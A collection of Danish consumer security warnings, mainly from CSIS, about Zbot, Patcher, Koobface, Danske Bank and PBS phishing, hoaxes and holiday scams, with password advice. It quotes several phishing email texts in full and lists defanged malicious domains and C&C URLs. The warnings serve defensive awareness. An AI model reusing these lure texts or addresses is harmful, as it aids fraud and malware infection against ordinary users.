
Værktøjet kræver, at du har Microsoft .Net Framework 2 installeret på systemet. Hovedparten af nyere udgaver af Microsoft Windows har allerede dette framework installeret, men har du problemer med at køre programmet, så kan Microsoft .Net Framework (dotnetfx.exe) hentes gratis hos Microsoft.

En trin for trin vejledning til brug af værktøjet er udarbejdet af Nordea og findes på deres hjemmeside.

Finansrådet har udsendt en pressemeddelelse, som du kan læse hos Finansrådet.

Hvad er Patcher?
Patcher (også kendt som Multipatch/W32.Patch) er et userland kernel rootkit, som "patcher" (heraf navnet) centrale Microsoft windows filer (kernel32.dll, powrprof.dll og wininet.dll) og gør "systemgendannelse" af filerne umulig efter infektion og genstart af maskinen. Det betyder, at den eneste måde at gennemføre en sikker rensning af en inficeret maskine er ved at geninstallere Microsoft Windows.
Husk at tage kopi af dokumenter og billeder, inden maskinen formatteres og Windows installeres på ny.

Patcher angriber udelukkende Microsoft Windows og kan IKKE inficere MacOSX eller Linux distributioner.

Misbruger sårbarheder

Den skadelige Patcher kode lister sig ind på systemer igennem såkaldt "klient side drive-by angreb", hvor den misbruger sårbarheder i software, som ikke er forsvarligt opdateret.

Patcher er designet til at angribe udvalgte mål og vil automatisk og uden yderligere advarsel eller symptomer downloade og køre supplerende komponenter på et inficeret system.
De supplerende komponenter består blandt andet af et Browser Helper Object (BHO), som hooker sig til Microsoft Internet Explorer og foretager Man in The Browser funktioner.
Indsamlede data gemmes først lokalt og transporteres derefter løbende til en frontend server i deres infrastruktur, der foretager forskillige checks, hvorefter data sendes fra frontend servere og videre ind mod en MySQL understøttet backup server, som udelukkende kommunikerer med frontend serveren.

Opdateres løbende

Patcher bliver løbende vedligeholdt, og den binære kode opdateres hyppigt for at undgå, at antivirusprogrammer opdager den.
Banden bag denne informationstyv angriber udvalgte geografiske områder for at undgå international bevågenhed.
CSIS' statistik over inficerede maskiner afslører en høj koncentration af Patcher-inficerede maskiner i særligt Grækenland og Danmark.

Vigtigt at opdatere sin PC
Desværre opnår de mange variationer af Patcher kun yderst begrænset antivirusdetektion (i gennemsnit 4/42), hvilket gør det særligt vigtigt, at du husker at opdatere programmer, der installeres på maskinen eller i netværket.
Flere af de populære tredjepartsprogrammer som misbruges til at tvangsfodre maskinen med den skadelige kode, vil typisk være at finde på en "præinstalleret" PC.
Man bør derfor kontrollere om der anvendes seneste version af Adobe Reader/Acrobat, Adobe Flash, Sun Java JRE og Quicktime.

Brug programmet Health Check til at sikre, at alle dine programmer er opdaterede.

Det er samtidig vigtigt, at du er i besiddelse af en legitim licenseret version af Microsoft Windows, så du løbende kan installere sikkerhedsopdateringer, der kommer fra Microsoft (for eksempel igennem funktionen "automatiske sikkerhedsopdateringer"/Windows Update). Det gælder også sikkerhedsopdateringer til Microsoft Office kontorpakken.

Kilde: CSIS Security Group

 

Sikkerhedsfirmaet CSIS har i aftes og nat registreret endnu et nyt spamrun, der udspringer fra en gruppe af it-kriminelle, som systematisk inficerer vilkårlige brugere med den skadelige informationstyv Zbot.

Denne gang er det Visa, der anvendes som lokkemad for disse spammails.

Tricket går i sin enkelthed ud på at lokke almindelige slutbrugere til at klikke på et medfølgende link, der peger på en download server hostet i Avalanche BOTnettet.
Den pågældende webserver, som i virkeligheden er en zombie hostet i det bagvedliggende fast flux understøttede BOTNet, tilbyder filen
"cardstatement.exe".
Dette sker via en - lidt håbløst - forfalsket Visa side

Sammen med filen, der via social engineering tilbydes fra den falske Visa
side, er også plantet et script, der peger på en klassisk klient side drive-by
server (mellemrum indlagt af CSIS): http://bers df.com/sfx/in.php.
Der anvendes udelukkende nyere exploits rettet mod følgende produkter: Adobe
Reader/Acrobat, Adobe Flash Player og Microsoft DirectShow. Det vil sige, at det gælder om at have disse produkter opdateret, så man ikke risikerer at ryge i fælden.

Den skadelige fil fanges af TDC's Sikkerhedspakke.

Kilde: CSIS Security Group

 

Julen er et af de travleste tidspunkter for online-svindlere. Ikke kun fordi millioner af forbrugere handler online, men også fordi mange ikke er så påpasselige, når de bliver grebet af julestemningen.
Sørg for, at de cyberkriminelle ikke tager juleglæden fra dig med deres svindel og fupnumre.
Se de 12 tricks, du skal være ekstra opmærksom på her i december.

Velgørenhed
Velvidende at forbrugerne gerne giver mere på denne tid af året, sender hackerne falske mails, der beder om donationer. De ser ud til at være fra legitime velgørende organisationer. Men disse mails linker normalt til falske websteder, der tager dine penge uden at sende så meget som en øre videre til en god sag.
Gå hellere på organisationens hjemmeside, hvis du er i tvivl om ægtheden.

Falske julehilsner
Det bliver mere og mere almindeligt at sende postkort over nettet i stedet for et traditionelt julekuvert med PostDanmark. Det er nemmere og miljømæssigt grønt. Cyberkriminelle spammer læssevis af mails ud, hvor der er et link til at hente dit kort eller en vedhæftet fil, der påstår at være et julekort til dig.
Men den vedhæftede fil er ikke et rigtig postkort, og linket fører dig heller ikke til et kort med bjældeklang og julemænd. Det er i stedet skadelig software, som installeres på din maskine, uden du opdager det.

Når softwaren først er installeret, holder det øje med, hvad du foretager dig på pc'en og kan styre den uden dit vidende.

Bekræft kontooplysninger
Svindlerne er klar over, at der op til jul er flere, der køber ind over nettet og vil sikre sig, at deres transaktioner er godkendte.
Nogle af de grimme fyre sender dig en mail, der ser ud som om, at den kommer fra officielle kilder. I mailen bliver du bedt om at bekræfte kontooplysninger, herunder dit brugernavn og password. Ofte bliver opfordringen fulgt af tordnende advarsler om, at din konto bliver ugyldig, hvis du ikke får det gjort.

Du skal aldrig svare på anmodninger i en mail om dine personlige eller økonomiske oplysninger.

Faktura-svindel
I løbet af december kan det være, at du shopper online, over telefonen eller gennem kataloger.

Det ved de luskede it-kriminelle godt. Så de forsøger at få dig til at give dine personlige finansielle oplysninger væk via falske fakturaer. Forbryderne sender dig en mail med en falsk faktura eller leverings-anmeldelse, der ser ud til at være fra FedEx, UPS eller eksempelvis det amerikanske toldvæsen.

Mailen beder dig om dine kreditkort-oplysninger, således at din konto kan blive krediteret eller kræver, at du åbner en faktura eller told-formular, så du kan modtage pakken.
Når du gør, som de beder om, bliver dine oplysninger stjålet, eller du får installeret malware på din maskine.

Venne-anmodnings-svindel
Julen er åbenbart også højsæson for at støve gamle venskaber op på populære sociale netværk. Så man bliver glad, når man får en besked om, at man har en ny venneanmodning.
Desværre bruger svindlerne denne glæde til at sende links til falske anmodninger ud. De ser ud som om, at de kommer fra de sociale netværk, men det er faktisk links til malware som virus, trojanske heste og keylogging-software, der kan registrere dine tastetryk - blandt andet de adgangskoder, du skriver.

Ringetoner og pauseskærme
Vi er tilsyneladende også mere pjattede med skøre ringetoner og pauseskærmen, når kalenderen når til december. Men du risikerer at downloade meget mere, end det lige var planen - såsom malware eller spyware.

Job-relateret mail-svindel
De it-kriminelle har også sunget 'Højt fra træets grønne top', og ved, at julen varer længe og koster mange penge. Så de tænker, at du nok gerne vil have lidt flere kontanter at gøre godt med.

Så de sender mails for at lokke jobsøgende med løfter om godt betalte job, som du kan udføre hjemmefra.
Når du sender dine oplysninger til dem, napper de dine oplysninger og dine penge.

Password-tyveri-svindel
At få stjålet din adgangskode er en sikker måde at ødelægge din juleferie på. Tyvene bruger billige værktøjer til at gætte dit password eller levere malware, der registrerer computerens tastetryk (keylogging), når du indtaster din adgangskode.

Når kriminelle har din adgangskode, kan de få adgang til din bank, kreditkort eller andre online-konti og tage penge fra dig. De kan også bruge dine konti til at sende spam til dine venner og hele dit netværk.

Bedrageri via auktionssider
Hackere ved, at der er flere besøg på auktionssider i julen, så de ofte lurer på disse websteder i håb om at narre dine hårdt tjente penge fra dig. Hvis en vare ser for god til at være sand, er den det sikkert ogsår.

Så gennemgå sælgerens bedømmelse fra andre brugere og prøv at sætte dig i kontakt med vedkommende.

Og betal med dit kreditkort, da kreditkortselskaber normalt refunderer dig, hvis der er fup indblandet.

Mails med vedhæftet tingeltangel
Når det bliver december, så slår vi åbenbart al fornuft fra og klikker lystigt på alt, der ender i vores indbakke med en vedhæftet fil.
Også det har de it-kriminelle lært i den store snydeskole. Så de vil forsøge at lokke dig til at åbne disse vedhæftede filer eller klikke på links, der downloader malware.

Så sæt antenner på nissehuen og vær på vagt!

Online identitetstyveri
Med så mange mennesker, der handler online i løbet af december, er der en masse cyberkriminelle, der opretter falske websteder designet til at stjæle dine oplysninger og i sidste ende din identitet.
Vær forsigtig med websteder, der gemmer dine personlige informationer, og sørg for at du ikke tilgår butikken fra en offentlig computer, da andre brugere kan få adgang til dine gemte brugernavne og passwords.

En tommelfingerregel er kun at benytte butikker, der har en hjemmeside, der bruger kryptering for at beskytte dine oplysninger.
Sørg for, at netadressen begynder med 'https:' i stedet for 'http:'. Dette betyder, at der bliver brugt kryptering på hjemmesiden.

Ransomware
Vi er vant til at se mere onlinesvindel omkring ferien, så det nyeste trick drager fordel af ønsket om at holde vores systemer fri for virus.
'Ransomware' er en trojansk hest, der virker som om, at den kører en virusscanning på din maskine. Den fortæller dig, at den har opdaget en virus, og at du skal betale for et falsk antivirus-program for at slippe af med virussen igen. Men der er selvfølgelig ingen, der fortæller dig, at programmet er falsk og totalt nytteløst.
Du bliver låst ude fra din pc, og du kan ikke åbne eller få adgang til alle programmer, indtil du har betalt for programet.

Tag dine forholdsregler:
Brug almindelig sund fornuft

- Hvis det lyder for godt til at være sandt, så er det det sandsynligvis også. Hvis du nogensinde i tvivl, om noget er lovligt, skal du ikke klikke på det.

Hold dig opdateret

- Hold dig opdateret om de nyeste fiduser og tricks, cyberkriminelle bruger for at få fat i dine oplysninger, så du kan undgå potentielle angreb. Tilmeld dig eksempelvi sikkerhedsnyhedsbrevet.

Brug antivirus-program

- Du har brug for en fuldstændig beskyttelse, der inkluderer anti-virus, anti-spyware, anti-spam, og en firewall, og så skal du sørge for, at det er opdateret.

Dyrk sikker surfing

- Du kan forsemepl bruge McAfee SiteAdvisor ® softwaren til at advare dig om et websteds er vurderet som sikkert eller usikkert eller slå forskellige phishingmuligheder til i din browser.

Shop sikkert

- Lad være med at videregive unødvendige oplysninger, de steder du handler.
Du kan for eksempel kontrollere, om der mærker fra for eksempel E-handelsfonden eller lignende, som indikerer, at stedet er blevet bedømt som sikkert af en tredjepart, tjekke web-adressen indeholder "http s" og bruge et kreditkort til betaling.

Vælg et godt password

- Brug komplekse passwords, der består af en kombination af bogstaver, tal og symboler og brug ikke det samme alle de steder, du logger ind. Og del aldrig din adgangskode med nogen!

Klik med forsigtighed

- Når du kontrollerer din mail eller chatter via instant messenger, skal du være forsigtig med ikke at klikke på eventuelle links i meddelelser fra folk, du ikke kender.

Vær mistænksom

- Selv om du anser dig selv for cyber-kyndig, er du stadig nødt til at holde vagt og være opmærksom overfor eventuelle nye tricks og være proaktiv i forhold til din sikkerhed.

Kilde: McAfee.com

 

ADVARSEL Mail vil tjekke dit CPR-nummer.

Tjek dine personlige oplysninger, siger mailen. Den er ude efter dig og din maskine.

Sikkerhedsfirmaet CSIS har her til eftermiddag stoppet et antal spammails i deres mailfirewall, som påstår at ville tjekke dit CPR-nummer.

Når man ser på indholdet i mailen, så er det nok amerikanerne, den er ude efter. Men selvom det ikke er sandsynligt, at danskere falder for den, så vælger vi alligevel at advare om den.

De uønskede e-mails ankommer med følgende indhold:

Emnelinje: [en af følgende kombinationer]

Review annual Social Security statement
Review your annual Social Security statement
Watch for errors on Social Security statement
Watch for errors on your Social Security statement

Indhold: (mellemrum indlagt af CSIS)

Due to possible identity theft, your annual Social Security statement may contain errors.

Use the link below to review your annual Social Security statement:

Review your annual Social Security statement

Mailen siger, at på grund af et muligt identitetstyveri, så skal du tjekke dit årlige Social Security Statement. Det er ens personlige side, hvor man har overblikket over sin skat, sociale ydelser og lignende.

Zbot variant

Den skadelige kode tilbydes i form af en Zbot variant med filnavnet "statement.exe". Hvis denne fil åbnes af en uforsigtig bruger, så droppes skadelig kode til systemet, som binder maskinen ind i et BOTnet.

Så du skal blot slette mailen og ikke under nogen omstændigheder give dig til at give dit cpr-nummer og lignende personlige oplysninger fra dig.

Kilde: CSIS Security Group
 

Sikkerhedsfirmaet CSIS har stoppet et større antal spammails, der udspringer fra det BOTnet, der kendes som "Avalanche".

De uønskede e-mails ankommer med følgende indhold:



Fra: [Spoofet afsender]

Emnelinje: update your [%modtager@domæne%] mailbox

Indhold:

Dear owner of the [%modtager@domæne%] mailbox,
You have to change the security mode of your account, from standart to
secure. Please change the security mode by using the link below:

http://accounts.domain.com.[avalanche fast flux
domæne]/webmail/settings/noflash.php?

Klikker man på linket, føres man over til en side, hvor det kræves, at man installerer yderligere software, som det ses på billedet oven over. Hvis en uforsigtig bruger klikker på det pågældende, føres man til en Avalanche download server, som tilbyder en skadelig binær fil i Zbot familien. Zbot er en regulær informationstyv.

CSIS har indtil videre blacklistet mere end 20 nye domæner, herunder de mest
dominante (mellemrum indlagt af CSIS):

ver zzg.co.uk
ver zzn.me.uk
ver zzg.me.uk
ver zzm.me.uk
mod ertps.be
ftp ddrs.be

Koden dropper Zbot kode til systemet og forbinder sig til en C&C server på
følgende hardkodede URLs via port 80 (mellemrum indlagt af CSIS):

http://193.10 4.27.42/livs/rec.php
http://193.10 4.27.42/lcc/ip2.gif
http://193.10 4.27.42/ip.php

Den skadelige kode opnår følgende tilfredsstillende antivirusdetektion og fanges blandt andet af TDC's Sikkerhedspakke. Men det kan desværre godt ændre sig, da koden ændres time for time.

Kilde: CSIS Security Group



 

Budweiser frøer er hoax

Modtager du et kædebrev om Budweiser Frøer, der kan spise hele din maskine, så slet den bare.

Sikkerhedsfirmaet CSIS har stoppet flere kædebreve, også kaldet hoax, som cykler rundt blandt lidt for godtroende danske brugere.

Der er tale om en gammel kending der advarer om nogle frygtelige, men yderst harmløse 'Budweiser frøer', som kan ødelægge din PC.

Den pågældende hoax, der netop nu cirkulerer blandt danske brugere, sendes rundt med følgende indhold:

Emne:

READ IMMEDIATLY AND PLEASE CIRCULATE

Indhold:

READ AND PASS ON TO EVERYONE YOU KNOW

Someone is sending out a very cute screensaver of the Budweiser Frogs.

If you download it, you will lose everything! Your hard drive will crash and someone from the Internet will get your screen name and password! DO NOT DOWNLOAD IT UNDER ANY CIRCUMSTANCES!

It just went into circulation yesterday. Please distribute this message.This is a new, very malicious virus and not many people know about it. This information was announced yesterday morning from Microsoft. Please share it with everyone that might access the Internet.

Mailen fortæller, at der bliver sendt en pauseskærm med Budweiser frøer. Hvis man downloader den, vil ens computer crashe, og en anden tilfældig bruger på nettet vil få dit brugernavn og password. Så den skal du naturligvis holde dig fra, siger mailen.

Når du modtager en mail med denne ordlyd eller tilsvarende, bør du naturligvis slå din naturlige skepsis og sunde fornuft til. Slet disse tossede mails og undlad at sende dem videre. Det er rent tidsspilde ...

Det kan være svært at vide, hvornår en advarsel er reel, og når den bliver sendt videre af nogen, der ikke aner, hvad de taler om.
I dette tilfælde kan det være en god ide at søge på noget af indholdet i mailen - Budweiser Frogs eller kopiere noget af teksten.
Flere af de links, der dukker op i Google, indeholder netop ordet hoax. Så det giver en god idé om, hvad du har at gøre med.

Kilde: CSIS Security Group
 

PAS PÅ FALSK MICROSOFT MAIL MED ORME-VÆRKTØJ.

Får du mail fra Microsoft med et værktøj til at fjerne ormen Conficker, så slet den omgående.

CSIS har opdaget en spammail, der foregiver at komme fra Microsoft og være et gratis rense-program fra Microsoft til den skadelige orm Conficker, som har inficeret i tusindvis af brugere over hele verden.

Det bedste råd herfra er at slette mailen. Microsoft udsender aldrig mails med vedhæftede filer til brugere, uden at man forudgående har bedt om det.

Den uønskede spammail ankommer med følgende indhold:

Emnelinje:

Conficker.B Infection Alert Spam

Indhold:

Dear Microsoft Customer,

Starting 18/10/2009 the ‘Conficker' worm began infecting Microsoft customers unusually rapidly. Microsoft has been advised by your Internet provider that your network is infected.

To counteract further spread we advise removing the infection using an antispyware program. We are supplying all effected Windows Users with a free system scan in order to clean any files infected by the virus.

Please install attached file to start the scan. The process takes under a minute and will prevent your files from being compromised. We appreciate your prompt cooperation.

Regards,
Microsoft Windows Agent #2 (Hollis)
Microsoft Windows Computer Safety Division

Vedhæftet: install.zip --> install.exe

Zipfilen indeholder en exe-fil,en skadelig dropper, som forbinder sig til en server, herfra den henter og kører et falsk sikkerhedsværktøj (Antivirus Pro 2010).

Den har samtidig en anden download-funktion som endnu ikke er taget i brug endnu, men CSIS mistænker, at pakken også ønsker at installere Zbot kode.

Den medfølgende zip-fil og medfølgende pakke fanges i øjeblikket ikke af ret mange antivirus-programmer.

SEND GERNE DENNE MAIL VIDERE TIL DINE VENNER.

Kilde: CSIS Security Group
 

Pas på falske Outlook Express-opdateringer.

Modtager du en mail om, at du skal opdatere Outlook Express, skal du blot slette den. Den er falsk og farlig.

Sikkerhedsfirmaet CSIS har stoppet flere spammails, der foregiver at komme fra Microsoft og være en opdatering til Outlook Express.

Således ser mailen ud:

Fra: Forfalsket afsender-adresse

Emnelinje:

Microsoft Outlook Notification for the [%domænenavn på modtager%]

Indhold:

You have (6) New Message from Outlook Microsoft

- Please re-configure your Microsoft Outlook Again.

- Download attached setup file and install.

Vedhæftet:
install.zip --> Install.exe

Filen, som leveres, vil installere et falsk antivirus-produkt.

Den forbinder sig samtidig til en server, hvorfra der hentes og køres opdateringer og hvortil der afleveres data - for eksempel fortrolige oplysninger, den har hentet på din pc.

(VIDERSEND GERNE DENNE MAIL/INFORMATION TIL DINE VENNER)


Kilde: CSIS Security Group
 

Undgå at andre hacker sig ind i din mail. Få gode råd til at lave et stærkt kodeord.

Der er nogle enkle regler til kodeord, som gør dem sværere at gætte for uvedkommende.

Gør kodeordet langt. Jo længere dit kodeord er jo bedre. Som hovedregel skal dit kodeord minimum være på otte tegn, mens 14 tegn eller derover er ideelt. Nogle systemer og programmer tillader også mellemrum i dit kodeord, så kan du ligefrem lave en hel ”kodesætning”, som gør det endnu sværere at lure koden.

Kombiner bogstaver, numre og symboler. Hvis du bruger tegn fra hele tastaturet, er dit kodeord betydeligt stærkere, end hvis du for eksempel kun bruger bogstaver.

Brug ord og sætninger, du let kan huske. Men som er svære for andre at gætte.

Et sikkert kodeord i seks trin:

Tænk på en sætning, du kan huske. Dette er basen i din kode. Det kan for eksempel være "Min søn Martin er tre og går i børnehave".
Find ud af, om du kan bruge hele sætningen. Tjek om din computer eller det internetsted, du er på, tillader brug af mellemrum, hvis det gør, så kan du bruge hele sætningen som kode.
Hvis du ikke kan bruge hele sætningen, så konverter det til et kodeord ved at tage det første bogstav i hvert ord. Så vil du for eksempel få "msmetogib".

Tilføj noget kompleksitet ved at bruge store og små bogstaver og tilføje tal. For eksempel kan du udskifte tre med tallet 3, og så gøre noget af bogstaverne store, "MsmE3ogiB".
Udskift nu nogle af bogstaverne/tallene med specielle tegn, som eventuelt minder om bogstaver, for eksempel "M$mE3&giB".

Test din kode med Microsofts Password Checker http://www.microsoft.com/athome/security/privacy/password_checker.mspx

Det skal du undgå:

Sekvenser eller gentagede tegn, som "123456789", "abcdefghij", "77777777", samt tegn der sidder i rækkefølge på tastaturet "qwertyuiop".

Kun at bruge symboler der minder om bogstavet/tegnet. Hackere og kriminelle kender de mest almindelige erstatninger for bogstaver og tal, som "1" i stedet for "i", "@" i stedet for "a" og "$" i stedet for "s". Men hvis du sørger for at gøre koden lang, store og små bogstaver osv., så er symbolerne effektive.

Privat information. Brug ikke dele af dit navn, dit cpr-nummer eller din families personlige oplysninger til kodeordet.

Brug mere end et kodeord. Sørg for, at det ikke er det samme kodeord, du bruger alle steder.

KILDE: TDC ONLINE 

Koobface laver falske Facebook-profiler

Godkend ikke ukendte folk på Facebook. Det kan være ormen Koobface, der vil sælge dig falske sikkerhedsprogrammer.

Banden bag den sociale netværksorm 'Koobface' har haft en ualmindelig travl weekend.

Ikke alene har banden gennemført omfattende ændringer i deres bagvedliggende infrastruktur, der omfatter deres download og Command & Control servere.

Koobface banditterne har også gennemført en ny kampagne, hvor der systematisk oprettes falske Facebook profiler som i en vildskab inviterer tilfældelige Facebook-brugere til et noget ejendommeligt venskab.
Formålet med 'venskabet' er udelukkende at eksponere uforsigtige Facebook-brugere for skadelig software, herunder falske sikkerhedsprodukter.

Så det er supervigtigt, at du ikke godkender venskaber med Facebook-brugere, du ikke kender.

Profiler lukkes ned

Koobface har i weekenden gennemført flere ændringer i deres forretning.

Det mest synlige udadtil, er at de nu er begyndt at oprette falske Facebook-profiler, og herigennem udsætte vilkårlige brugere for ondsindede scripts og links i beskeder, der sendes på kryds og tværs af det store netværk. Linksene går blandt andet til falske sikkerhedsprogrammer, som de håber at lokke dig til at købe.

Sikkerhedsfirmaet CSIS har registreret flere end 350 falske profiler, som de samtidig kan fortælle, at Facebook arbejder hårdt på at lukke ned.

Den nye pakke af Koobface malware indeholder blandt andet captcha.dll og captch.bat. Disse komponenter skal bruges til at bryde CAPTCHA på valide websider med det formål at oprette konti under forskellige online services, herunder blotspot.com og Facebook. På billedet ser du en CAPTCHA, som skal bruges til at sikre, at det er et menneske og ikke en robot, der tilmelder sig til en tjeneste.

Spredes på mange sites

På nuværende tidspunkt spredes Koobface via følgende online services:

facebook.com
tagged.com
friendster.com
myspace.com
msplinks.com
lnk.ms
myyearbook.com
fubar.com
twitter.com
hi5.com
bebo.com
Som det fremgår af ovenstående script udtræk, er der ikke medtaget særlige søgemaskine-kampagner, herunder kampagner under blogspot.com og så videre.

Den nye pakke af skadelige Koobface komponenter opnår kun yderst begrænset antivirus detektion.

Kilde: CSIS Security Group

 

Ugen starter med et nyt phishing-angreb. Også denne gang er det i Danske Banks navn.

Den bande af it-kriminelle, som i sidste uge begyndte at udsende phishing-mails til vilkårlige modtagere i Danmark, er på spil igen. Her til morgen er endnu en bølge rullet ind i tusindvis af danske indbakker. Denne gang forsøger de it-kriminelle at høste flere oplysninger end ved tidligere phishingforsøg.

Det er samme fremgangsmåde som tidligere. Phishingmailen udsendes med
følgende indhold:

Fra: danskebank@danskebank.dk

Emne:

Opret din kode til Verified by Visa eller MasterCard SecureCode

Indhold:

Sikker nethandel

Nu er det nemmere at handle i forretninger, der er tilmeldt
MasterCard SecureCode og Verified by Visa. Verified by Visa og
MasterCard SecureCode er indført som sikkerhedsstandard af de to
internationale kortorganisationer i fællesskab. Det betyder, at
betalingen sker på samme måde, uanset om du bruger dit Visa kort
eller MasterCard.

Øget sikkerhed i flere og flere forretninger
Antallet af internetforretninger, der har indført den nye
sikkerhedsstandard, stiger hele tiden verden over. Handler du tit
i udenlandske internetforretninger, vil du jævnligt blive bedt om
at anvende én af disse to sikre betalingsformer.

Opret din kode nu - eller næste gang du handler
Før du kan handle i internetforretninger, der benytter Verified
by Visa og SecureCode, skal du enten oprette din kode her , eller
næste gang du handler i en internetforretning, som anvender
sikkerhedsstandarden.

Download og færdiggøre "Opret din kode til Verified by Visa eller
MasterCard® SecureCode" formular (.HTM).

Endnu flere oplysninger

Med denne mail følger et dokument med endelsen .htm, som modtageren skal lokkes til at åbne og udfylde med sensitive oplysninger.
De indtastede oplysninger sendes til en server, der fysisk befinder sig i New York, USA.

De følsomme oplysninger, som brugeren skal lokkes til at opgive denne gang, omfatter følgende:

Kortnummer
Udløbsdato
CSC
Fornavn
Efternavn
Adresselinje 1
Adresselinje 2 (valgfri)
By
Stat/provins/region
Postnummer


Hjemmesiden lukkes snart

Data sendes ukrypteret via HTTP til serveren (mellemrum indlagt af CSIS): malanewo od00291.net.

Domænet er registeret den 27. september i år igennem 'Domain Discreet'. På den måde kan bagmændene beskytte registrant-oplysningerne og kan gemme sig. Domænet udløber allerede om en måned, og er tydeligvis oprettet med det specifikke formål at skulle misbruges i dette phishingforsøg.

CSIS er i telefonisk kontakt med hosting provideren og forventer, at domænet
samt serveren vil blive lukket i løbet af få timer.

Indtil da skal du være mistænkelig over for, hvad der sker i din indbakke og slette denne mail med det samme, hvis den lander i din.

Kilde: CSIS Security Group

 

En skabelon, der beder dig indtaste koder på dine kreditkort, er et udspekuleret phishing-angreb.

Den gruppe af cybergangstere, der har misbrugt PBS i forsøg på at høste kreditkort-oplysninger fra uforsigtige brugere, misbruger nu i stedet Danske Bank's gode navn i en mail på udemærket dansk for at lokke oplysninger fra intetanende brugere.

Målet er stadigt at lokke godtroende brugere til at opgive deres kreditkort-oplysninger i en medfølgende skabelon. En udfyldt skabelon sendes videre til en fremmed server, som kontrolleres af IT-kriminelle. De har dermed dine kreditkort-oplysninger og kan bruge løs af dine penge, hvis en udfyldt skabelon sendes videre.

Teksten i mailen lyder:

Sikker nethandel

Nu er det nemmere at handle i forretninger, der er tilmeldt MasterCard SecureCode og Verified by Visa. Verified by Visa og MasterCard SecureCode er indført som sikkerhedsstandard af de to internationale kortorganisationer i fællesskab. Det betyder, at betalingen sker på samme måde, uanset om du bruger dit Visa kort eller MasterCard.

Øget sikkerhed i flere og flere forretninger Antallet af internetforretninger, der har indført den nye sikkerhedsstandard, stiger hele tiden verden over. Handler du tit i udenlandske internetforretninger, vil du jævnligt blive bedt om at anvende én af disse to sikre betalingsformer.

Opret din kode nu - eller næste gang du handler Før du kan handle i internetforretninger, der benytter Verified by Visa og SecureCode, skal du enten oprette din kode her, eller næste gang du handler i en internetforretning, som anvender sikkerhedsstandarden.

Download og færdiggøre "Opret din kode til Verified by Visa eller MasterCard® SecureCode" formular (.HTM).

Billedet er desværre ikke tydeligt, men skal gerne få dine alarmklokker til at ringe utroligt højt, hvis du modtager en mail med et lignende billede.
Mailen skal naturligvis slettes omgående.

Sikkerhedschef hos Danske Bank Poul Otto Schousboe beder folk, der har udfyldt formularen og trykket på noget om at sætte sig i kontakt med banken.

Kilde: CSIS Security Group
 

Phishing-mail udgiver sig for at være fra PBS og vil have fingre i dine kreditkort-detaljer

En gruppe IT-kriminelle har i weekenden spammet en masse mails ud, der foregiver at komme fra danske PBS.

Målet er at lokke godtroende brugere til at opgive deres kreditkort-oplysninger i en medfølgende skabelon. Men ikke overraskende sendes de indtastede data til en fremmed server, der er under kontrol af IT-kriminelle.

Fejlfrit dansk

Der er tale om målrettet phishing mod danske kreditkort-brugere. Indholdet er skrevet på fejlfrit dansk.


Fra : VISA

Emne: Opret din kode til Verified by Visa eller MasterCard SecureCode

Indhold:

Sikker nethandel

Nu er det nemmere at handle i forretninger, der er tilmeldt MasterCard
SecureCode og Verified by Visa. Verified by Visa og MasterCard SecureCode er indført som sikkerhedsstandard af de to internationale kortorganisationer i fællesskab. Det betyder, at betalingen sker på samme måde, uanset om du bruger dit Visa kort eller MasterCard.

Øget sikkerhed i flere og flere forretninger Antallet af internetforretninger, der har indført den nye sikkerhedsstandard, stiger hele tiden verden over. Handler du tit i udenlandske internetforretninger, vil du jævnligt blive bedt om at anvende én af disse to sikre betalingsformer.

Opret din kode nu eller næste gang du handler Før du kan handle i
internetforretninger, der benytter Verified by Visa og SecureCode, skal du enten oprette din kode her , eller næste gang du handler i en internetforretning, som anvender sikkerhedsstandarden.

Du skal downloade og udfylde formularen

Den medfølgende formular (se billedet) transporterer de indtastede data til en fremmed webserver, som intet har med PBS at gøre. Serveren befinder sig i USA på et webhotel der deler plads med flere end 100 andre domæner.

Du skal naturligvis bare slette mailen, hvis den lander i din indbakke.

Kilde: CSIS Security Group

 

En Facebook applikation kan give et falsk sikkerhedsprogram med oven i hatten.

En hoax (fup/kædebrev) florerer netop nu mellem Facebook-brugere. Det er, i følge sikkerhedsfirmaet CSIS' oplysninger den første hoax, der spredes rundt mellem bekymrede Facebook-brugere, og som målrettet lukrerer på frygten for en Facebook virus. En søgning internt i Facebook giver cirka en halv million hits.

Der er tale om appliaktionen 'Facebook Fan Virus', som man kunne udfylde for at få et overblik over hvilke af ens venner, der skrev mest på ens væg og lignende. Selve programmet virkede godt nok - men der var en bonus oveni i form af et falsk antivirus-program.

Det kan være svært at skelne snot fra godt, og umiddelbart er der ingen retningslinjer at forholde sig til. Du må bruge din sunde fornuft og hellere være for forsigtig, når det kommer til applikationerne på Facebook.

Applikationen fjernet

Der findes talrige links, som beskriver 'Facebook Fan Virus', men det er vigtigt at understrege, at der altså er tale om fup, men ikke mere fup, end at applikationerne er ægte og uønskede og vil lokke brugeren til at installere falske sikkerhedsprodukter. Der er altså endnu en gang tale om en skadelig applikation, som tilbydes overpå Facebooks web2.0 platform.

De uønskede Facebook applikationer, som nu er blevet suspenderet, består af henholdsvis (mellemrum indlagt af CSIS):

http://apps.facebook.com/fan check/
http://apps.facebook.com/sta lkercheck/

Kilde: CSIS Security Group

 

Danske internetbrugere har længe måttet tage sig i agt for spam i deres mailpostkasser. Nu viser et andet generende fænomen sig at være i vækst blandt danske internetbrugere: Phishing.

En phishing-mail er en mail, der forsøger at fiske efter personlige oplysninger som for eksempel brugernavn og password til en mailkonto, en netbank-konto, et firmanetværk eller andre vitale tjenester. Fænomenet har været kendt fra engelsksprogede lande i nogle år, men i de sidste måneder er phishing-mails begyndt at dukke op i stigende tal i Danmark.

Advarsel

Nu finder TDC's tekniske sikkerhedschef Lars Højberg det relevant at sende en advarsel til danske netbrugere:

- Vi oplever en vækst i antallet af dansksprogede phishing-mails, og de bliver stadig mere professionelt udført. Phishing-forsøg kan være meget målrettede, for eksempel direkte mod enkeltindivider, så som en direktør i et firma. Det gør alt sammen, at en phishing-mail kan være svær at gennemskue.

TDC's spamfilter, der fanger 300-500 millioner mails om måneden, fanger også phishing-mails i omløb. 1 ud af 300 mails, der sendes på nettet, vurderes at være en phishing-mail. Undersøgelser viser, at mange flere brugere reagerer på en phishing mail end en spammail.

Lars Højbergs 5 gode råd om phishing:

Forhold dig kritisk til de mails, som spørger efter følsomme oplysninger som kreditkortoplysninger eller brugernavn/password.

Lad være med at aflevere følsomme informationer som kreditkortoplysninger eller brugernavn/password i en mail.

Hvis du i en mail bliver bedt om at aflevere følsomme oplysninger på en web-side, så skriv firmaets internet-adresse, som du allerede kender den, på adresselinjen i browseren i stedet for at følge et link i mailen.

